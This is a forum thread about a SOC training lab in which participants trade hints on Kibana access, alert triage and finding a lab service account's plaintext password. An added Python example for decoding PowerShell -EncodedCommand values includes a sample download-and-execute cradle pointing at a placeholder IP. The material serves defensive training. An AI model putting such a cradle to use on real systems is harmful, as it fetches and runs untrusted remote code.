Forum Discussion
Trick or Treat on Specter Street: Ghost of the SOC
Hi there,
Am I right, as obvious as it may seem, that to log in to Kibana I need to access it through the Elastic IP address I have entered in my browser? If so, I'm getting the error message shown in my screenshot. I tried this a few days ago as well and the problem persisted then too.
11 Replies
- S1m0n07
Bronze I
If I remember correctly you need to add 5601, the port, to the URL and it should work.
- Dark_Knight666
Bronze III
For question 1, I can see an active alert but it appears I'm not able to view it? I also played about with the option for "Group alerts by: ......", yet to no avail. Am I doing something incorrectly?
- Samh051
Bronze II
You're set to the last 24 hours; try changing the time range and you should see something.
- Dark_Knight666
Bronze III
So I've moved it from Sep 15, as specified on the briefing panel, to Sep 16, but still no results?
- ThreatWhisperer
Bronze II
I succeeded in practically all steps except the last one.
I found the ghost's first communication, the human account, the scripts folder, and the service account.
I can connect with the human account (for which I know the password), but I don't know how to use the service account, for which I don't have the credentials, so I can't do much.
I found a simple way to avoid the annoying messages using the human account, but I can't really eliminate the presence.
Did I miss something?
Any good advice?
- Samh051
Bronze II
It's tricky. The svc account password is stored in plain text in a file somewhere.
Try looking for something on the machine which looks a little out of place, then go deeper.
- ThreatWhisperer
Bronze II
Ah, that was easy, thx!
Now I've got the password, and I can e.g. use it to disable that account, but it doesn't seem to be enough to remove the persistence :-(
Edit: Never mind, I found another thread here discussing the same lab with the right hint to proceed!
- Dark_Knight666
Bronze III
Still a little stuck on Q1 🤯
So looking through the PowerShell command line, I understand that the script is a Base64 string, and I found what I think may be the Ghost's communication, but when I pass this through CyberChef it appears not to be correct. I am decoding it from Base64. Am I completely off the mark here?
- Samh051
Bronze II
Expand the alert instead of clicking on the rule name.
Use this button -
You should then be able to see the base64 encoded argument.
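An added note and example for the two posts above about the Base64 argument (this is not from the thread or the lab's own material): the value after PowerShell's -EncodedCommand switch is Base64 over UTF-16LE text, not UTF-8, so "From Base64" on its own yields output with a NUL byte after every character and looks wrong. In CyberChef, chain "Decode text" with encoding UTF-16LE after "From Base64"; the Python below does the same and also shows why the naive decode looks broken. The command line, script and URL are constructed placeholders, and the switch spellings handled by the regex are an assumption covering the common abbreviations PowerShell accepts, not an exhaustive list.

```python
import base64
import re
from typing import Optional

# Constructed sample script (not from the lab); the host is a documentation IP.
SAMPLE_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/ghost.ps1')"
)


def encode_command(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it:
    Base64 over the UTF-16LE bytes of the script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line, shaped like a process.command_line field in an alert.
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden "
    f"-EncodedCommand {encode_command(SAMPLE_SCRIPT)}"
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; this list is
# an assumption covering the spellings seen most often (-e, -ec, -en, -enc).
# -ExecutionPolicy does not match because it is followed by letters, not whitespace.
ENC_SWITCH = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the Base64 blob that follows the encoded-command switch, if any."""
    m = ENC_SWITCH.search(cmdline)
    return m.group(1) if m else None


def _restore_padding(arg: str) -> str:
    # Some log pipelines trim trailing '=' padding; restore it before decoding.
    return arg + "=" * (-len(arg) % 4)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Correct decode: Base64 -> raw bytes -> UTF-16LE text."""
    arg = extract_encoded_argument(cmdline)
    if arg is None:
        return None
    raw = base64.b64decode(_restore_padding(arg))
    return raw.decode("utf-16-le")


def decode_naively(cmdline: str) -> Optional[str]:
    """What 'From Base64' alone shows: the raw bytes read as single-byte text,
    so every second character is a NUL (\\x00)."""
    arg = extract_encoded_argument(cmdline)
    if arg is None:
        return None
    return base64.b64decode(_restore_padding(arg)).decode("latin-1")


if __name__ == "__main__":
    print("switch argument :", extract_encoded_argument(SAMPLE_CMDLINE))
    print("naive decode    :", repr(decode_naively(SAMPLE_CMDLINE)))
    print("UTF-16LE decode :", decode_encoded_command(SAMPLE_CMDLINE))
```

The naive output is still useful as a triage signal: a Base64 blob that decodes to text with a NUL between every letter is almost always an encoded PowerShell command, so you know which decoder to apply next.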
- Dark_Knight666
Bronze III
Oh dear! I have expanded the alert but still can't find the base64 encoded argument (Am I really that blind, I wonder?)